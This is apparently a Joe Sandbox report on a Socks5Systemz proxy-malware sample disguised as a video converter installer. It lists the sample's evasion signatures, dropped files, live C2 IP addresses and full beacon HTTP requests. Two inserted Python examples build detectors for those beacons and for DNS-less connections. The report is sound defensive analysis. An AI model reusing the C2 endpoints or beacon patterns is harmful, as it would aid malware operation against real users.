
Windows Analysis Report
Oz2UhFBTHy.exe

Overview

General Information

Sample name: Oz2UhFBTHy.exe (renamed because original name is a hash value)
Original sample name: 667621f07a3de153960af063462b20fe.exe
Analysis ID: 1576054
MD5: 667621f07a3de153960af063462b20fe
SHA1: d58576525b3020446b244bba68d5cd3b6fef1f15
SHA256: efec8c0153efdda5a578ec1dd1a08254fc04a4036adda01ab44a4415e02cb852
Tags: exe, user-abuse_ch

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Uses known network protocols on non-standard ports
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Oz2UhFBTHy.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\Oz2UhFBTHy.exe" MD5: 667621F07A3DE153960AF063462B20FE)
    • Oz2UhFBTHy.tmp (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe" MD5: 9D6E5DF4EF5AD8914D4A482A3BC8BB55)
      • videoconverterfactory.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i MD5: 044E781B9914BD4A3851BF6BA7D7C9D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-LETAI.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: videoconverterfactory.exe PID: 7880 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
3.0.videoconverterfactory.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

No Sigma rule has matched


AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ab Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325 Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4 Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52 Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab710463926 Avira URL Cloud: Label: malware
Source: Oz2UhFBTHy.exe ReversingLabs: Detection: 15%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 2_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_0045D254 ArcFourCrypt, 2_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_0045D23C ArcFourCrypt, 2_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_10001000 ISCryptGetVersion, 2_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_10001130 ArcFourCrypt, 2_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe Unpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack
Source: Oz2UhFBTHy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Converter Factory_is1
Source: unknown HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49837 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-7N8CJ.tmp.2.dr
Source: Binary string: msvcr71.pdb< source: is-L1OQV.tmp.2.dr
Source: Binary string: msvcp71.pdb source: is-7N8CJ.tmp.2.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-T8AR0.tmp.2.dr
Source: Binary string: msvcr71.pdb source: is-L1OQV.tmp.2.dr
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_00452A60 FindFirstFileA,GetLastError, 2_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 2_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 2_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 2_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp Code function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00463CDC

Networking

Source: unknown Network traffic detected: HTTP traffic on port 2024 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 2024
Source: global traffic TCP traffic: 192.168.2.9:49843 -> 31.214.157.206:2024
Source: global traffic HTTP traffic detected:
    GET /rand HTTP/1.1
    Host: 31.214.157.226
    Accept: */*
Source: Joe Sandbox View IP Address: 31.214.157.206 31.214.157.206
Source: Joe Sandbox View IP Address: 188.119.66.185 188.119.66.185
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49837 -> 188.119.66.185:443
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49878 -> 188.119.66.185:443
Source: global traffic HTTP traffic detected:
    GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
Source: global traffic HTTP traffic detected:
    GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185 (40 occurrences)
                  Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206 (10 occurrences)
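The finding above is a correlation: each outbound TCP connection is checked against the DNS answers seen earlier in the capture, and a destination that no answer produced is reported. The sample reaches its C2 by IP literal (the Host header below is 188.119.66.185, and the same address appears as https://188.119.66.185/ strings in memory), so no lookup ever precedes the connect. The following Python is added here as an example; it is not code from the Joe Sandbox report or from the sample. It reproduces the check over constructed Zeek-style dns.log / conn.log records: the destination IPs are the ones the report lists, while the timestamps, ports, hostnames and the benign resolved address are invented.

```python
"""Flag TCP connections whose destination no earlier DNS answer resolved to.

Added example, not part of the Joe Sandbox report. Log records below are
constructed; only the destination IPs come from the report.
"""
from collections import Counter
from ipaddress import ip_address

# Constructed DNS answers (ts = capture time in seconds).
DNS_LOG = [
    {"ts": 100.0, "query": "www.innosetup.com", "answers": ["93.184.216.34"]},  # invented answer
    {"ts": 106.0, "query": "late.example", "answers": ["31.214.157.226"]},      # invented, answered after the connect
]

# Constructed outbound TCP connections.
CONN_LOG = [
    {"ts": 102.0, "dst": "93.184.216.34", "dport": 80},     # resolved first: the legitimate pattern
    {"ts": 103.0, "dst": "188.119.66.185", "dport": 80},    # C2 host from the report, never resolved
    {"ts": 103.5, "dst": "188.119.66.185", "dport": 443},
    {"ts": 104.0, "dst": "31.214.157.206", "dport": 8080},  # second host from the report; port invented
    {"ts": 104.5, "dst": "239.255.255.250", "dport": 1900}, # SSDP multicast: Windows noise, must not alert
    {"ts": 105.0, "dst": "31.214.157.226", "dport": 80},    # resolved only afterwards: still flagged
]


def resolved_before(dns_log, ts):
    """IPs returned by any DNS answer observed at or before `ts`.

    Non-address answers (CNAME targets, for instance) are skipped.
    """
    ips = set()
    for rec in dns_log:
        if rec["ts"] <= ts:
            for answer in rec["answers"]:
                try:
                    ips.add(str(ip_address(answer)))
                except ValueError:
                    continue
    return ips


def connections_without_dns(dns_log, conn_log):
    """Return (dst, dport) for each connection to a public unicast IP that no earlier DNS answer produced.

    Multicast and non-global destinations (RFC 1918, link-local, loopback) are ignored:
    Windows hosts talk to them constantly without DNS and they would swamp the result.
    """
    flagged = []
    for conn in conn_log:
        dst = ip_address(conn["dst"])
        if dst.is_multicast or not dst.is_global:
            continue
        if conn["dst"] not in resolved_before(dns_log, conn["ts"]):
            flagged.append((conn["dst"], conn["dport"]))
    return flagged


def per_destination(flagged):
    """Collapse the flagged list to a count per destination, like the report's repeated lines."""
    return Counter(dst for dst, _ in flagged)


if __name__ == "__main__":
    hits = connections_without_dns(DNS_LOG, CONN_LOG)
    for dst, n in per_destination(hits).items():
        print(f"TCP traffic detected without corresponding DNS query: {dst} ({n} connections)")
```

The temporal check matters: an answer that arrives after the connection (the 31.214.157.226 record) does not excuse it, which is how a hard-coded address that the malware later also resolves still gets caught.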
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D22B95 WSASetLastError,WSARecv,WSASetLastError,select
                  Source: global traffic | HTTP traffic detected (1 request, second key value):
                      GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Host: 188.119.66.185
                  Source: global traffic | HTTP traffic detected (28 identical requests):
                      GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Host: 188.119.66.185
                  Source: global traffic | HTTP traffic detected (2 identical requests):
                      GET /rand HTTP/1.1
                      Host: 31.214.157.226
                      Accept: */*
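The requests above are the sample's beaconing pattern: GET /ai/?key=<hex> to 188.119.66.185 with a raw IP in the Host header and a fixed User-Agent claiming "Windows NT 9.0" (a version Windows never shipped), plus a bare GET /rand to 31.214.157.226 that carries no User-Agent at all. The two observed keys share their first 43 hex characters and differ after that, so a signature should match the structure of the request rather than a full key value. The following Python is added here as an example; it is not code from the report or from the sample. It parses request heads constructed from the values shown above (the benign request is invented for contrast) and scores each against those traits; the 64-hex-character minimum, the list of known Windows NT versions and the two-trait alert threshold are the author's assumptions.

```python
"""Score HTTP request heads for the Socks5Systemz beacon traits the report lists.

Added example, not code from the Joe Sandbox report or the sample. BEACON
and RAND are rebuilt from the report's values; BENIGN is invented.
"""
from __future__ import annotations

import re
from ipaddress import ip_address

# Assumption: NT versions that genuine Windows user agents carry. 9.0 was never shipped.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
MIN_KEY_HEX_LEN = 64  # assumption; the two keys in the report are 164 and 172 hex chars

# First key value observed in the report.
KEY1 = ("8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce7"
        "4dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d1"
        "8f414ad332231ad73389d7d2965a")

BEACON = (
    f"GET /ai/?key={KEY1} HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
    "Host: 188.119.66.185\r\n\r\n"
)
RAND = "GET /rand HTTP/1.1\r\nHost: 31.214.157.226\r\nAccept: */*\r\n\r\n"
# Constructed benign request for contrast: hostname, real NT version, ordinary query.
BENIGN = (
    "GET /ishelp/index.php?topic=setupcmdline HTTP/1.1\r\n"
    "Host: www.jrsoftware.org\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n\r\n"
)


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.x request head into method, path, query, version and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query, "version": version, "headers": headers}


def beacon_indicators(req: dict) -> list[str]:
    """Name each beacon trait present in one parsed request."""
    hits = []
    host = req["headers"].get("host", "").split(":")[0]  # IPv4 host[:port] assumed
    try:
        ip_address(host)
        hits.append("host-is-ip-literal")  # no DNS involved, matches the report's DNS-less TCP finding
    except ValueError:
        pass
    key = re.fullmatch(r"key=([0-9a-fA-F]+)", req["query"])
    if req["path"] == "/ai/" and key and len(key.group(1)) >= MIN_KEY_HEX_LEN:
        hits.append(f"ai-key-hex-{len(key.group(1))}")
    ua = req["headers"].get("user-agent")
    if ua is None:
        hits.append("no-user-agent")
    else:
        nt = re.search(r"Windows NT (\d+\.\d+)", ua)
        if nt and nt.group(1) not in KNOWN_NT_VERSIONS:
            hits.append(f"bogus-nt-version-{nt.group(1)}")
    return hits


def classify(raw: str, threshold: int = 2) -> tuple[bool, list[str]]:
    """Alert when at least `threshold` traits co-occur; a bare IP Host alone is too common to alert on."""
    hits = beacon_indicators(parse_request(raw))
    return len(hits) >= threshold, hits


if __name__ == "__main__":
    for name, raw in (("beacon", BEACON), ("rand", RAND), ("benign", BENIGN)):
        print(name, classify(raw))
```

The /ai/ beacon trips three traits and the /rand request two; the contrast request trips none. Matching on the key prefix alone would be brittle for the same reason matching the whole key is: the bytes after the shared prefix change between requests.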
                  Source: videoconverterfactory.exe, 00000003.00000000.1372571688.00000000004D5000.00000002.00000001.01000000.00000009.sdmp, VideoConverterFactory.exe.3.dr, is-LETAI.tmp.2.dr, videoconverterfactory.exe.2.dr | String found in binary or memory: http://wonderwork.ucoz.com/
                  Source: Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | String found in binary or memory: http://www.innosetup.com/
                  Source: Oz2UhFBTHy.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                  Source: Oz2UhFBTHy.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | String found in binary or memory: http://www.remobjects.com/ps
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.dr | String found in binary or memory: http://www.remobjects.com/psU
                  Source: videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/-X
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/0
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/?X
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/CX
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/T
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/UX
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/a
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003320000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab710463926
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/gX
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/mH
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ography
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/priseCertificates
                  Source: videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/rosoft
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/yX
